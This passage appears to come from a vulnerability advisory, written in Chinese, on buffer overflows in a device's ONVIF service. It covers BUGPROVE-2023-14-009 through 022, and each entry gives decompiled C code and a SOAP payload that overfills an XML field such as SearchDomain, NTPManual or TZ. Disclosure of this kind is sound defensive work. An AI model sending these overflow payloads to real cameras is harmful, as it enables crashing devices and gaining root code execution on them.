goto LAB_0000b4cc;
strncpy(&cStack664,body_pointer,sVar6 + 1);
pcVar3 = strchr(&cStack664,0x3a);
pcVar3 = pcVar3 + 1;
__c = 0x3e;
}
以下有效负载演示了此问题
<s:Body xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><GetScopes xmlns=\"http://AAAAAAAA.......
/></s:Body>
这使得未经身份验证的远程攻击者能够破坏 Onvif 服务,并在根用户的上下文中在设备上运行任意代码。
一系列身份验证后漏洞
所报告的其他问题都是由于上述在BUGPROVE-2023-14-002中讨论的不安全的XML元素查找所致,然而,与安全相关的漏洞点(例如实际的缓冲区溢出点)位于只有经过身份验证的用户才能访问的二进制文件中。
BUGPROVE-2023-14-009
存在漏洞的代码如下:
iVar1 = strcmp(param_3,"SetDNS");
if (iVar1 == 0) {
memset(dnsmanual,0,0x200);
memset(acStack440,0,0x40);
memset(fromdhcp,0,0x40);
memset(local_b0,0,0x40);
memset(domain,0,0x100);
lookup_field_xml(document,&DAT_000332f4,fromdhcp);
iVar6 = lookup_field_xml(document,"DNSManual",dnsmanual);
iVar1 = lookup_field_xml(document,"SearchDomain",domain);
if (iVar1 != 0) {
memset((char *)(param_4 + 0x597),0,0x100);
strcpy((char *)(param_4 + 0x597),domain);
}
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">OQVQa48ZhUh04oiQkPeU514MpSU=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3YAAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-15T08:28:59.557Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetDNS xmlns="http://www.onvif.org/ver10/device/wsdl">
<FromDHCP>AAAAAAAAAAAAA...........</FromDHCP>
<DNSManual>
<Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
<IPv4Address xmlns="http://www.onvif.org/ver10/schema">192.168.1.254</IPv4Address>
</DNSManual>
<DNSManual>
<Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
<IPv4Address xmlns="http://www.onvif.org/ver10/schema">8.8.8.8</IPv4Address>
</DNSManual>
</SetDNS>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-010
存在漏洞的代码如下:
iVar1 = strcmp(param_3,"SetDNS");
if (iVar1 == 0) {
memset(dnsmanual,0,0x200);
memset(acStack440,0,0x40);
memset(fromdhcp,0,0x40);
memset(local_b0,0,0x40);
memset(domain,0,0x100);
lookup_field_xml(document,&DAT_000332f4,fromdhcp);
iVar6 = lookup_field_xml(document,"DNSManual",dnsmanual);
iVar1 = lookup_field_xml(document,"SearchDomain",domain);
if (iVar1 != 0) {
memset((char *)(param_4 + 0x597),0,0x100);
strcpy((char *)(param_4 + 0x597),domain);
}
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">OQVQa48ZhUh04oiQkPeU514MpSU=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3YAAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-15T08:28:59.557Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetDNS xmlns="http://www.onvif.org/ver10/device/wsdl">
<SearchDomain>AAAAAAAAAAAAA.........</SearchDomain>
<DNSManual>
<Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
<IPv4Address xmlns="http://www.onvif.org/ver10/schema">192.168.1.254</IPv4Address>
</DNSManual>
<DNSManual>
<Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
<IPv4Address xmlns="http://www.onvif.org/ver10/schema">8.8.8.8</IPv4Address>
</DNSManual>
</SetDNS>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-011
存在漏洞的代码如下:
iVar3 = 0;
*(undefined *)(param_4 + 0x12b7) = 0;
*(undefined *)(param_4 + 0x1235) = 0;
local_4558 = document;
do {
memset(dnsmanual,0,0x200);
memset(local_b0,0,0x40);
memset(acStack440,0,0x40);
local_4558 = (char *)get_xml_element(local_4558,dnsmanual,"DNSManual");
if (iVar6 == 0) goto LAB_00016370;
lookup_field_xml(dnsmanual,"Type",acStack440);
iVar1 = lookup_field_xml(dnsmanual,"Type",acStack440);
if ((iVar1 != 0) && (iVar1 = strcmp(acStack440,"IPv4"), iVar1 == 0)) {
lookup_field_xml(dnsmanual,"IPv4Address",local_b0);
iVar1 = FUN_0001bf0c(local_b0);
if (iVar1 == 0) goto LAB_00016384;
if (local_b0[0] != '\0') {
pcVar4 = (char *)(param_4 + 0x12b8);
if (iVar3 != 0) {
pcVar4 = (char *)(param_4 + 0x12d8);
}
strcpy(pcVar4,local_b0);
}
}
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">OQVQa48ZhUh04oiQkPeU514MpSU=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3YAAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-15T08:28:59.557Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetDNS xmlns="http://www.onvif.org/ver10/device/wsdl">
<DNSManual>
<Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
<IPv4Address xmlns="http://www.onvif.org/ver10/schema"></IPv4Address>
</DNSManual>
<DNSManual>
<Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
<IPv4Address xmlns="http://www.onvif.org/ver10/schema">AAAAAAAAAAAAAAAA........</IPv4Address>
</DNSManual>
</SetDNS>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-012
存在漏洞的代码如下:
iVar3 = 0;
*(undefined *)(param_4 + 0x12b7) = 0;
*(undefined *)(param_4 + 0x1235) = 0;
local_4558 = document;
do {
memset(dnsmanual,0,0x200);
memset(local_b0,0,0x40);
memset(acStack440,0,0x40);
local_4558 = (char *)get_xml_element(local_4558,dnsmanual,"DNSManual");
if (iVar6 == 0) goto LAB_00016370;
lookup_field_xml(dnsmanual,"Type",acStack440);
iVar1 = lookup_field_xml(dnsmanual,"Type",acStack440);
if ((iVar1 != 0) && (iVar1 = strcmp(acStack440,"IPv4"), iVar1 == 0)) {
lookup_field_xml(dnsmanual,"IPv4Address",local_b0);
iVar1 = FUN_0001bf0c(local_b0);
if (iVar1 == 0) goto LAB_00016384;
if (local_b0[0] != '\0') {
pcVar4 = (char *)(param_4 + 0x12b8);
if (iVar3 != 0) {
pcVar4 = (char *)(param_4 + 0x12d8);
}
strcpy(pcVar4,local_b0);
}
}
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">OQVQa48ZhUh04oiQkPeU514MpSU=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3YAAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-15T08:28:59.557Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetDNS xmlns="http://www.onvif.org/ver10/device/wsdl">
<DNSManual>
<Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
<IPv4Address xmlns="http://www.onvif.org/ver10/schema"></IPv4Address>
</DNSManual>
<DNSManual>
<Type xmlns="http://www.onvif.org/ver10/schema">AAAAAAAAAAAAA...</Type>
<IPv4Address xmlns="http://www.onvif.org/ver10/schema">8.8.8.8</IPv4Address>
</DNSManual>
</SetDNS>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-013
存在漏洞的代码如下:
void set_ntp(char *param_1,int param_2,undefined4 param_3)
{
int iVar1;
char acStack2592 [1024];
undefined auStack1568 [512];
undefined auStack1056 [512];
char acStack544 [128];
char acStack416 [128];
undefined auStack288 [128];
char local_a0 [128];
memset(acStack2592,0,0x400);
memset(local_a0,0,0x80);
memset(auStack288,0,0x80);
memset(auStack1056,0,0x200);
memset(auStack1568,0,0x200);
memset(acStack416,0,0x80);
memset(acStack544,0,0x80);
lookup_field_xml(param_3,&from,acStack544);
get_xml_element(param_3,auStack1056,"NTPManual");
get_xml_element(param_3,auStack1568);
iVar1 = strcmp(acStack544,"true");
*(bool *)(param_2 + 0x1379) = iVar1 == 0;
iVar1 = lookup_field_xml(auStack1056,"Type",acStack416);
if (iVar1 == 0) {
iVar1 = lookup_field_xml(auStack1568,"Type",acStack416);
if (iVar1 == 0) goto LAB_000145ec;
iVar1 = strcmp(acStack416,"IPv4");
}
else {
iVar1 = strcmp(acStack416,"IPv4");
}
if (iVar1 == 0) {
lookup_field_xml(auStack1056,"IPv4Address",local_a0);
lookup_field_xml(auStack1056,"DNSname",auStack288);
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">60/Axdm/co8WyRAmw4oP99W+FBg=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3UBAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-20T05:12:01.109Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetNTP xmlns="http://www.onvif.org/ver10/device/wsdl">
<FromDHCP>false</FromDHCP>
<NTPManual>
<Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
<IPv4Address xmlns="http://www.onvif.org/ver10/schema">AAAAA...</IPv4Address>
</NTPManual>
</SetNTP>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-014
存在漏洞的代码如下:
void set_ntp(char *param_1,int param_2,undefined4 param_3)
{
int iVar1;
char acStack2592 [1024];
undefined auStack1568 [512];
undefined auStack1056 [512];
char acStack544 [128];
char acStack416 [128];
undefined auStack288 [128];
char local_a0 [128];
memset(acStack2592,0,0x400);
memset(local_a0,0,0x80);
memset(auStack288,0,0x80);
memset(auStack1056,0,0x200);
memset(auStack1568,0,0x200);
memset(acStack416,0,0x80);
memset(acStack544,0,0x80);
lookup_field_xml(param_3,&from,acStack544);
get_xml_element(param_3,auStack1056,"NTPManual");
get_xml_element(param_3,auStack1568);
iVar1 = strcmp(acStack544,"true");
*(bool *)(param_2 + 0x1379) = iVar1 == 0;
iVar1 = lookup_field_xml(auStack1056,"Type",acStack416);
if (iVar1 == 0) {
iVar1 = lookup_field_xml(auStack1568,"Type",acStack416);
if (iVar1 == 0) goto LAB_000145ec;
iVar1 = strcmp(acStack416,"IPv4");
}
else {
iVar1 = strcmp(acStack416,"IPv4");
}
if (iVar1 == 0) {
lookup_field_xml(auStack1056,"IPv4Address",local_a0);
lookup_field_xml(auStack1056,"DNSname",auStack288);
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">60/Axdm/co8WyRAmw4oP99W+FBg=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3UBAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-20T05:12:01.109Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetNTP xmlns="http://www.onvif.org/ver10/device/wsdl">
<FromDHCP>false</FromDHCP>
<NTPManual>AAAAAAAAA...</NTPManual>
</SetNTP>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-015
存在漏洞的代码如下:
void set_ntp(char *param_1,int param_2,undefined4 param_3)
{
int iVar1;
char acStack2592 [1024];
undefined auStack1568 [512];
undefined auStack1056 [512];
char acStack544 [128];
char acStack416 [128];
undefined auStack288 [128];
char local_a0 [128];
memset(acStack2592,0,0x400);
memset(local_a0,0,0x80);
memset(auStack288,0,0x80);
memset(auStack1056,0,0x200);
memset(auStack1568,0,0x200);
memset(acStack416,0,0x80);
memset(acStack544,0,0x80);
lookup_field_xml(param_3,&fromdhcp,acStack544);
get_xml_element(param_3,auStack1056,"NTPManual");
get_xml_element(param_3,auStack1568);
iVar1 = strcmp(acStack544,"true");
*(bool *)(param_2 + 0x1379) = iVar1 == 0;
iVar1 = lookup_field_xml(auStack1056,"Type",acStack416);
if (iVar1 == 0) {
iVar1 = lookup_field_xml(auStack1568,"Type",acStack416);
if (iVar1 == 0) goto LAB_000145ec;
iVar1 = strcmp(acStack416,"IPv4");
}
else {
iVar1 = strcmp(acStack416,"IPv4");
}
if (iVar1 == 0) {
lookup_field_xml(auStack1056,"IPv4Address",local_a0);
lookup_field_xml(auStack1056,"DNSname",auStack288);
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">60/Axdm/co8WyRAmw4oP99W+FBg=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3UBAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-20T05:12:01.109Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetNTP xmlns="http://www.onvif.org/ver10/device/wsdl">
<FromDHCP>AAAAAA.....</FromDHCP>
<NTPManual></NTPManual>
</SetNTP>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-016
存在漏洞的代码如下:
void set_ntp(char *param_1,int param_2,undefined4 param_3)
{
int iVar1;
char acStack2592 [1024];
undefined auStack1568 [512];
undefined auStack1056 [512];
char acStack544 [128];
char acStack416 [128];
undefined auStack288 [128];
char local_a0 [128];
memset(acStack2592,0,0x400);
memset(local_a0,0,0x80);
memset(auStack288,0,0x80);
memset(auStack1056,0,0x200);
memset(auStack1568,0,0x200);
memset(acStack416,0,0x80);
memset(acStack544,0,0x80);
lookup_field_xml(param_3,&from,acStack544);
get_xml_element(param_3,auStack1056,"NTPManual");
get_xml_element(param_3,auStack1568);
iVar1 = strcmp(acStack544,"true");
*(bool *)(param_2 + 0x1379) = iVar1 == 0;
iVar1 = lookup_field_xml(auStack1056,"Type",acStack416);
if (iVar1 == 0) {
iVar1 = lookup_field_xml(auStack1568,"Type",acStack416);
if (iVar1 == 0) goto LAB_000145ec;
iVar1 = strcmp(acStack416,"IPv4");
}
else {
iVar1 = strcmp(acStack416,"IPv4");
}
if (iVar1 == 0) {
lookup_field_xml(auStack1056,"IPv4Address",local_a0);
lookup_field_xml(auStack1056,"DNSname",auStack288);
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">60/Axdm/co8WyRAmw4oP99W+FBg=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3UBAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-20T05:12:01.109Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetNTP xmlns="http://www.onvif.org/ver10/device/wsdl">
<FromDHCP>false</FromDHCP>
<NTPManual>
<Type xmlns="http://www.onvif.org/ver10/schema">"AAAAAAA</Type>
<IPv4Address xmlns="http://www.onvif.org/ver10/schema"></IPv4Address>
</NTPManual>
</SetNTP>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-017
存在漏洞的代码如下:
void set_ntp(char *param_1,int param_2,undefined4 param_3)
{
int iVar1;
char acStack2592 [1024];
undefined auStack1568 [512];
undefined auStack1056 [512];
char acStack544 [128];
char acStack416 [128];
undefined auStack288 [128];
char local_a0 [128];
memset(acStack2592,0,0x400);
memset(local_a0,0,0x80);
memset(auStack288,0,0x80);
memset(auStack1056,0,0x200);
memset(auStack1568,0,0x200);
memset(acStack416,0,0x80);
memset(acStack544,0,0x80);
lookup_field_xml(param_3,&from,acStack544);
get_xml_element(param_3,auStack1056,"NTPManual");
get_xml_element(param_3,auStack1568);
iVar1 = strcmp(acStack544,"true");
*(bool *)(param_2 + 0x1379) = iVar1 == 0;
iVar1 = lookup_field_xml(auStack1056,"Type",acStack416);
if (iVar1 == 0) {
iVar1 = lookup_field_xml(auStack1568,"Type",acStack416);
if (iVar1 == 0) goto LAB_000145ec;
iVar1 = strcmp(acStack416,"IPv4");
}
else {
iVar1 = strcmp(acStack416,"IPv4");
}
if (iVar1 == 0) {
lookup_field_xml(auStack1056,"IPv4Address",local_a0);
lookup_field_xml(auStack1056,"DNSname",auStack288);
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">60/Axdm/co8WyRAmw4oP99W+FBg=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l3UBAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-20T05:12:01.109Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetNTP xmlns="http://www.onvif.org/ver10/device/wsdl">
<FromDHCP>false</FromDHCP>
<NTPManual>
<Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
<DNSname xmlns="http://www.onvif.org/ver10/schema">AAAAAAAAAAAAAAAAA..............</DNSname>
</NTPManual>
</SetNTP>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-018
存在漏洞的代码如下:
else {
iVar1 = strcmp(param_3,"SetSystemDateAndTime");
if (iVar1 == 0) {
memset(local_b0,0,0x81);
iVar1 = lookup_field_xml(document,"DateTimeType",local_b0);
if (iVar1 == 0) goto LAB_000171f0;
memset(fromdhcp,0,0x81);
memset(acStack440,0,0x81);
memset(auStack572,0,0x81);
memset(auStack704,0,0x81);
memset(auStack836,0,0x81);
memset(auStack968,0,0x81);
memset(auStack1100,0,0x81);
memset(dnsmanual,0,0x81);
memset(domain,0,0x81);
lookup_field_xml(document,"DaylightSavings",fromdhcp);
lookup_field_xml(document,"UTCDateTime",acStack440);
lookup_field_xml(document,"TZ",auStack572);
lookup_field_xml(document,&DAT_00034140,auStack704);
lookup_field_xml(document,"Minute",auStack836);
lookup_field_xml(document,"Second",auStack968);
lookup_field_xml(document,&DAT_00034153,auStack1100);
lookup_field_xml(document,"Month",dnsmanual);
lookup_field_xml(document,&DAT_0003415e,domain);
iVar1 = FUN_00014f38(acStack9548,local_b0,fromdhcp,auStack572,auStack1100,dnsmanual,
domain,auStack704,auStack836,auStack968,param_4);
}
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
<DateTimeType>AAAAAAAAAAAAAAAAAAAAA......</DateTimeType>
<DaylightSavings>false</DaylightSavings>
<TimeZone>
<TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
</TimeZone>
<UTCDateTime>
<Time xmlns="http://www.onvif.org/ver10/schema">
<Hour>21</Hour>
<Minute>29</Minute>
<Second>55</Second>
</Time>
<Date xmlns="http://www.onvif.org/ver10/schema">
<Year>2023</Year>
<Month>3</Month>
<Day>7</Day>
</Date>
</UTCDateTime>
</SetSystemDateAndTime>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-019
存在漏洞的代码如下:
参考BUGPROVE-2023-14-018.
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
<DateTimeType>Manual</DateTimeType>
<DaylightSavings>AAAAAAAAAAAAAAAAAAAAAAAA.........</DaylightSavings>
<TimeZone>
<TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
</TimeZone>
<UTCDateTime>
<Time xmlns="http://www.onvif.org/ver10/schema">
<Hour>21</Hour>
<Minute>29</Minute>
<Second>55</Second>
</Time>
<Date xmlns="http://www.onvif.org/ver10/schema">
<Year>2023</Year>
<Month>3</Month>
<Day>7</Day>
</Date>
</UTCDateTime>
</SetSystemDateAndTime>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-020
存在漏洞的代码如下:
参考BUGPROVE-2023-14-018.
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
<DateTimeType>Manual</DateTimeType>
<DaylightSavings>false</DaylightSavings>
<TimeZone>
<TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
</TimeZone>
<UTCDateTime>AAAAAAAAAAAAAAAAAAA.......</UTCDateTime>
</SetSystemDateAndTime>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-021
存在漏洞的代码如下:
参考BUGPROVE-2023-14-018.
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
<DateTimeType>Manual</DateTimeType>
<DaylightSavings>false</DaylightSavings>
<TimeZone>
<TZ xmlns="http://www.onvif.org/ver10/schema">AAAAAAAAAAAAAAAAAAAAA..................</TZ>
</TimeZone>
<UTCDateTime>
<Time xmlns="http://www.onvif.org/ver10/schema">
<Hour>21</Hour>
<Minute>29</Minute>
<Second>55</Second>
</Time>
<Date xmlns="http://www.onvif.org/ver10/schema">
<Year>2023</Year>
<Month>3</Month>
<Day>7</Day>
</Date>
</UTCDateTime>
</SetSystemDateAndTime>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-022
存在漏洞的代码如下:
参考 BUGPROVE-2023-14-018.
示例负载如下:
